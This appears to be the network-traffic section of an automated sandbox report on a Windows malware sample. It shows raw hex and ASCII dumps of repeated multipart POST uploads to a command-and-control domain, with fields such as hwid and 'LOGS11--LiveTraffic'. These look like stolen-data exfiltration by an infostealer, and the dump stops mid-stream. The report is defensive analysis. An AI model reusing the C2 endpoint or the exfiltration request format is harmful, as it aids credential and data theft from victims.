                                                                                                                                                                                                                                  2024-12-26 12:09:30 UTC1369INData Raw: 61 77 34 30 47 6a 41 43 70 6f 54 2b 70 38 51 67 43 51 51 34 67 4e 44 47 6a 6d 4d 44 54 38 41 44 31 53 44 6b 31 58 4a 45 65 39 56 62 50 6e 67 61 57 55 35 65 76 50 59 58 35 47 56 52 64 50 6d 31 6c 4e 2f 58 54 6c 61 71 6e 41 50 56 63 4f 54 56 63 71 78 37 6a 55 76 71 4c 45 4a 4d 43 30 75 49 32 73 62 5a 47 41 6d 42 78 66 48 63 75 75 74 65 4a 31 4b 6b 59 36 33 6f 35 5a 67 71 44 43 66 5a 48 33 6f 55 4e 69 33 7a 63 2b 6d 58 31 70 45 77 51 44 43 34 75 61 77 48 33 6d 4a 6d 71 73 58 6e 72 42 47 38 74 52 4e 5a 58 74 55 4f 56 30 45 48 64 51 59 36 77 4e 36 54 67 48 51 56 67 44 30 6c 69 4e 4c 37 49 6e 2f 33 6d 41 4c 77 45 64 69 31 45 76 56 6e 38 56 73 36 5a 46 35 64 53 6d 2b 49 4f 36 62 59 47 41 67 5a 78 57 33 63 77 74 39 2b 4f 2b 36 52 6e 35 45 35 2b 66 52 75 54 46 72
                                                                                                                                                                                                                                  Data Ascii: aw40GjACpoT+p8QgCQQ4gNDGjmMDT8AD1SDk1XJEe9VbPngaWU5evPYX5GVRdPm1lN/XTlaqnAPVcOTVcqx7jUvqLEJMC0uI2sbZGAmBxfHcuuteJ1KkY63o5ZgqDCfZH3oUNi3zc+mX1pEwQDC4uawH3mJmqsXnrBG8tRNZXtUOV0EHdQY6wN6TgHQVgD0liNL7In/3mALwEdi1EvVn8Vs6ZF5dSm+IO6bYGAgZxW3cwt9+O+6Rn5E5+fRuTFr
                                                                                                                                                                                                                                  2024-12-26 12:09:30 UTC1369INData Raw: 43 70 70 46 6a 4c 51 71 36 2f 34 64 57 45 51 50 55 46 38 79 76 39 2b 43 37 65 39 6d 30 67 51 33 4c 52 50 45 51 63 77 52 6e 63 67 2b 31 41 4b 45 34 6d 6e 6e 77 78 31 4d 55 44 5a 34 5a 58 4f 52 2b 36 4c 51 71 32 7a 31 55 54 74 5a 47 35 51 49 2f 6c 7a 5a 79 45 2f 61 52 4e 7a 36 59 65 6d 32 47 6c 4d 65 61 54 34 6d 5a 65 79 4c 7a 37 71 37 58 37 78 64 4f 58 74 63 33 45 75 37 45 63 66 49 57 64 6f 46 6e 37 41 6a 6f 66 55 49 51 52 6b 50 55 46 4d 77 76 74 6d 4f 2b 76 35 50 7a 48 70 73 62 68 4b 4b 48 75 4e 41 6c 63 5a 42 6c 51 4c 45 6d 33 48 76 74 69 45 4d 48 69 6b 75 4c 48 36 4d 32 35 62 6b 37 6c 62 6a 43 56 35 6a 47 34 55 50 35 55 62 61 79 45 2f 61 52 4e 7a 36 59 2b 6d 32 47 6c 4d 65 61 54 34 6d 5a 65 79 4c 7a 37 71 37 58 37 78 64 4f 58 74 63 33 45 75 37 45 63 66
                                                                                                                                                                                                                                  Data Ascii: CppFjLQq6/4dWEQPUF8yv9+C7e9m0gQ3LRPEQcwRncg+1AKE4mnnwx1MUDZ4ZXOR+6LQq2z1UTtZG5QI/lzZyE/aRNz6Yem2GlMeaT4mZeyLz7q7X7xdOXtc3Eu7EcfIWdoFn7AjofUIQRkPUFMwvtmO+v5PzHpsbhKKHuNAlcZBlQLEm3HvtiEMHikuLH6M25bk7lbjCV5jG4UP5UbayE/aRNz6Y+m2GlMeaT4mZeyLz7q7X7xdOXtc3Eu7Ecf
                                                                                                                                                                                                                                  2024-12-26 12:09:30 UTC1369INData Raw: 59 71 68 63 65 6d 32 45 67 49 47 63 57 39 2b 4c 72 54 58 6e 36 62 75 57 76 55 45 4e 79 30 53 78 45 47 31 55 4e 2b 59 44 4a 56 46 30 4b 51 2f 71 62 59 42 44 45 64 78 65 44 52 6d 36 70 62 59 2b 4b 6b 59 73 67 4e 36 66 77 36 43 47 75 4e 53 6b 72 59 2f 74 31 43 62 73 6a 4c 6c 78 78 4e 47 53 43 52 74 5a 44 6d 48 35 72 58 34 37 6c 44 78 42 6b 68 37 48 34 51 58 38 68 47 62 79 42 6e 61 47 74 79 50 49 36 44 6d 48 51 49 51 63 57 49 30 5a 76 6e 56 69 75 33 35 51 37 35 44 59 32 70 63 6d 31 66 73 45 63 50 49 57 63 6b 4d 33 4c 42 78 2f 37 5a 5a 54 46 4d 77 62 58 6f 39 71 38 71 65 36 66 39 44 74 58 70 48 51 41 36 44 43 66 59 54 35 49 55 46 6a 46 65 66 73 6a 61 5a 79 44 4e 51 57 53 46 74 4e 68 4b 2b 31 5a 54 55 31 33 66 6a 51 32 6b 76 4f 6f 63 50 39 68 47 62 79 42 6e 61
                                                                                                                                                                                                                                  Data Ascii: Yqhcem2EgIGcW9+LrTXn6buWvUENy0SxEG1UN+YDJVF0KQ/qbYBDEdxeDRm6pbY+KkYsgN6fw6CGuNSkrY/t1CbsjLlxxNGSCRtZDmH5rX47lDxBkh7H4QX8hGbyBnaGtyPI6DmHQIQcWI0ZvnViu35Q75DY2pcm1fsEcPIWckM3LBx/7ZZTFMwbXo9q8qe6f9DtXpHQA6DCfYT5IUFjFefsjaZyDNQWSFtNhK+1ZTU13fjQ2kvOocP9hGbyBna


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  3192.168.2.549707172.67.157.2544436460C:\Users\user\Desktop\YKri2nEBWE.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-12-26 12:09:32 UTC275OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=KXFK18MULF3J
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Content-Length: 12805
                                                                                                                                                                                                                                  Host: lev-tolstoi.com
                                                                                                                                                                                                                                  2024-12-26 12:09:32 UTC12805OUTData Raw: 2d 2d 4b 58 46 4b 31 38 4d 55 4c 46 33 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 42 44 44 37 42 34 37 37 45 32 44 44 31 39 38 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 4b 58 46 4b 31 38 4d 55 4c 46 33 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4b 58 46 4b 31 38 4d 55 4c 46 33 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 4b 58 46 4b 31 38 4d 55
                                                                                                                                                                                                                                  Data Ascii: --KXFK18MULF3JContent-Disposition: form-data; name="hwid"CBDD7B477E2DD198BEBA0C6A975F1733--KXFK18MULF3JContent-Disposition: form-data; name="pid"2--KXFK18MULF3JContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--KXFK18MU
                                                                                                                                                                                                                                  2024-12-26 12:09:36 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Date: Thu, 26 Dec 2024 12:09:35 GMT
                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=q4aji8hmknsavhos07kmnbcfj1; expires=Mon, 21 Apr 2025 05:56:13 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ca61AaKr3tD%2Bclhl9Jxa8wEc8frziceRVhQqBUZM1M1EeTlslN5C5oUQ%2Bimlu%2FsMLjGbMORTkDBAsiBzwrDNCP%2FK4GPSOPDHXyZkw2FEfSWUR7Fm45YFIPumSb03Dd2Dlxg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                  CF-RAY: 8f80f66c6e2c0c9e-EWR
                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1760&min_rtt=1696&rtt_var=764&sent=10&recv=18&lost=0&retrans=0&sent_bytes=2836&recv_bytes=13738&delivery_rate=1320669&cwnd=32&unsent_bytes=0&cid=8b710f8e4df3ca60&ts=3403&x=0"
                                                                                                                                                                                                                                  2024-12-26 12:09:36 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                  2024-12-26 12:09:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  4192.168.2.549709172.67.157.2544436460C:\Users\user\Desktop\YKri2nEBWE.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-12-26 12:09:37 UTC282OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=VKT7L0W22DT4VG3WF7N
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Content-Length: 15089
                                                                                                                                                                                                                                  Host: lev-tolstoi.com
                                                                                                                                                                                                                                  2024-12-26 12:09:37 UTC15089OUTData Raw: 2d 2d 56 4b 54 37 4c 30 57 32 32 44 54 34 56 47 33 57 46 37 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 42 44 44 37 42 34 37 37 45 32 44 44 31 39 38 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 56 4b 54 37 4c 30 57 32 32 44 54 34 56 47 33 57 46 37 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 56 4b 54 37 4c 30 57 32 32 44 54 34 56 47 33 57 46 37 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69
                                                                                                                                                                                                                                  Data Ascii: --VKT7L0W22DT4VG3WF7NContent-Disposition: form-data; name="hwid"CBDD7B477E2DD198BEBA0C6A975F1733--VKT7L0W22DT4VG3WF7NContent-Disposition: form-data; name="pid"2--VKT7L0W22DT4VG3WF7NContent-Disposition: form-data; name="lid"LOGS11--Li
                                                                                                                                                                                                                                  2024-12-26 12:09:38 UTC1127INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Date: Thu, 26 Dec 2024 12:09:38 GMT
                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=qtbvik64mr1auh2trah6fa7u37; expires=Mon, 21 Apr 2025 05:56:17 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sSFrmOdt05I9css%2BxdCbq3ll16j6trBqXl30hImvf%2B4rNTX7YETZ3B4w2e7E05unM3l0JLQt3TV6LnFOD5tvGX5lMIo9tIB5%2FmgwoLCRgztXNhJDcYDP6x86rCqY71iKGMY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                  CF-RAY: 8f80f68abefd32ca-EWR
                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1964&min_rtt=1924&rtt_var=801&sent=12&recv=20&lost=0&retrans=0&sent_bytes=2835&recv_bytes=16029&delivery_rate=1301247&cwnd=221&unsent_bytes=0&cid=6b19a7bb2f9ab54a&ts=993&x=0"
                                                                                                                                                                                                                                  2024-12-26 12:09:38 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                  2024-12-26 12:09:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  5192.168.2.549717172.67.157.2544436460C:\Users\user\Desktop\YKri2nEBWE.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-12-26 12:09:40 UTC276OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=GMDSDS57JOWEY
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Content-Length: 20543
                                                                                                                                                                                                                                  Host: lev-tolstoi.com
                                                                                                                                                                                                                                  2024-12-26 12:09:40 UTC15331OUTData Raw: 2d 2d 47 4d 44 53 44 53 35 37 4a 4f 57 45 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 42 44 44 37 42 34 37 37 45 32 44 44 31 39 38 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 47 4d 44 53 44 53 35 37 4a 4f 57 45 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 47 4d 44 53 44 53 35 37 4a 4f 57 45 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 47 4d 44 53 44
                                                                                                                                                                                                                                  Data Ascii: --GMDSDS57JOWEYContent-Disposition: form-data; name="hwid"CBDD7B477E2DD198BEBA0C6A975F1733--GMDSDS57JOWEYContent-Disposition: form-data; name="pid"3--GMDSDS57JOWEYContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--GMDSD
                                                                                                                                                                                                                                  2024-12-26 12:09:40 UTC5212OUTData Raw: 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                  Data Ascii: F3Wun 4F([:7s~X`nO`i
                                                                                                                                                                                                                                  2024-12-26 12:09:41 UTC1138INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Date: Thu, 26 Dec 2024 12:09:41 GMT
                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=rqgnka1hi58i193d4616b2eik1; expires=Mon, 21 Apr 2025 05:56:20 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dG%2BresSCpYZpH%2BJgkJogWNW086Z%2BOMak%2BiOchPfKsyxJ3PQUzWW0zfkUttgjw%2BrxNj6gX6HbLg9j4l%2FmForgK4c4XFWjdkhq%2BkVuiUyLrrXX%2BuxGRfvpfBYHqg39b3h00IQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                  CF-RAY: 8f80f69dbad843c8-EWR
                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1591&min_rtt=1579&rtt_var=617&sent=19&recv=26&lost=0&retrans=0&sent_bytes=2836&recv_bytes=21499&delivery_rate=1738095&cwnd=192&unsent_bytes=0&cid=930a85ea18d5e0ac&ts=1024&x=0"
                                                                                                                                                                                                                                  2024-12-26 12:09:41 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                  2024-12-26 12:09:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  6192.168.2.549729172.67.157.2544436460C:\Users\user\Desktop\YKri2nEBWE.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-12-26 12:09:43 UTC275OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=6D1VSVWUV9B0Q
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Content-Length: 1217
                                                                                                                                                                                                                                  Host: lev-tolstoi.com
                                                                                                                                                                                                                                  2024-12-26 12:09:43 UTC1217OUTData Raw: 2d 2d 36 44 31 56 53 56 57 55 56 39 42 30 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 42 44 44 37 42 34 37 37 45 32 44 44 31 39 38 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 36 44 31 56 53 56 57 55 56 39 42 30 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 36 44 31 56 53 56 57 55 56 39 42 30 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 36 44 31 56 53
                                                                                                                                                                                                                                  Data Ascii: --6D1VSVWUV9B0QContent-Disposition: form-data; name="hwid"CBDD7B477E2DD198BEBA0C6A975F1733--6D1VSVWUV9B0QContent-Disposition: form-data; name="pid"1--6D1VSVWUV9B0QContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--6D1VS
                                                                                                                                                                                                                                  2024-12-26 12:09:44 UTC1122INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Date: Thu, 26 Dec 2024 12:09:44 GMT
                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=fmjeeo8huct6947f4vbhdlhkek; expires=Mon, 21 Apr 2025 05:56:23 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hp%2Bg8eX%2FYwn24OnN6Q4FQxh3emYydlgy2Em7HOHb7BdsjapYstCEhxSJRmFFFrTm9BLADTZhQIRSvwncZfWg9RmdO1C4D9HJbc2adjcKkofKPzAWZb44YheM0FzVtSRCQH4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                  CF-RAY: 8f80f6b0adf44297-EWR
                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1724&min_rtt=1720&rtt_var=654&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=2128&delivery_rate=1660978&cwnd=245&unsent_bytes=0&cid=2ada217dbcbfb15d&ts=804&x=0"
                                                                                                                                                                                                                                  2024-12-26 12:09:44 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                  2024-12-26 12:09:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  7192.168.2.549736172.67.157.2544436460C:\Users\user\Desktop\YKri2nEBWE.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-12-26 12:09:46 UTC278OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=D4K1U7QC7LXR63
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Content-Length: 572733
                                                                                                                                                                                                                                  Host: lev-tolstoi.com
                                                                                                                                                                                                                                  2024-12-26 12:09:46 UTC15331OUTData Raw: 2d 2d 44 34 4b 31 55 37 51 43 37 4c 58 52 36 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 42 44 44 37 42 34 37 37 45 32 44 44 31 39 38 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 44 34 4b 31 55 37 51 43 37 4c 58 52 36 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 44 34 4b 31 55 37 51 43 37 4c 58 52 36 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 44 34
                                                                                                                                                                                                                                  Data Ascii: --D4K1U7QC7LXR63Content-Disposition: form-data; name="hwid"CBDD7B477E2DD198BEBA0C6A975F1733--D4K1U7QC7LXR63Content-Disposition: form-data; name="pid"1--D4K1U7QC7LXR63Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic--D4
                                                                                                                                                                                                                                  2024-12-26 12:09:46 UTC15331OUTData Raw: 18 6c b9 1a a5 a6 87 1f 24 1b 6e 2e 47 e3 48 07 cd 6b e8 68 3d 3b 10 75 80 e3 e1 c6 98 d9 48 d4 47 4b 3f 08 67 c8 16 68 32 df 6d a2 05 eb 77 e5 7e fb d9 69 cf fe ec 2e 13 15 92 a4 43 ab 86 b4 8b 90 38 07 81 2d 1e 5e bc 57 ff c5 0f 46 1a ec a4 2c 36 1b 2c c4 d7 ca 6d 2a cc 18 46 2c 3e 30 1d df 70 10 a2 92 19 39 88 d2 5a d3 9c 79 b9 0a fc 0f d0 b4 d1 c1 04 30 dd 8f 5e da 09 a4 84 a8 a4 6c de 30 2c 41 51 9b e3 63 9e a8 3f d9 6d 09 ef 0a 09 2d 26 2c be 4e d5 e4 49 42 ed 96 0b a4 9f 61 60 c8 1e f9 8f 9f 58 9d d4 73 5d 85 dc ba ac 1a b2 a3 1b 10 3a 83 62 e7 8d 23 81 d1 d2 cd 46 b5 b6 5b 4c 8b a9 96 1d 3d ab d7 9b ea 79 f5 b1 a1 19 90 25 0f 59 36 3a 16 9e 41 1d bf d3 1a c4 b5 c7 c0 74 68 62 95 5b 99 b1 87 96 d5 1c a1 cf 47 7a 0d 52 43 0f 20 44 37 61 f6 6f 33 aa
